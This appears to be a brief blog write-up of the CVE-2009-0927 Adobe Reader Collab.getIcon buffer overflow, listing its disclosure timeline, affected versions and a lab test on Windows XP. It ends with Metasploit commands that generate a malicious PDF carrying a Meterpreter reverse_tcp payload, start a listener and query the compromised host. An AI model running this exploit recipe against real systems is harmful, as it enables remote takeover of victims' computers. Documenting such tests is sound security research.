CVE-2009-0927 : Adobe Acrobat Collab.getIcon Buffer Overflow

Timeline :

Vulnerability reported to ZDI by Tenable Network Security
Vulnerability reported by ZDI to the vendor the 2008-07-03
Coordinated advisory release the 2009-03-24
Metasploit PoC provided by HD Moore the 2009-03-28
Milw0rm PoC provided by Abysssec the 2009-05-04

    PoC provided by :

MC
Didier Stevens
jduck

    Reference(s) :

CVE-2009-0927

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.1, prior to 8.1.3, and prior to 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_geticon
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig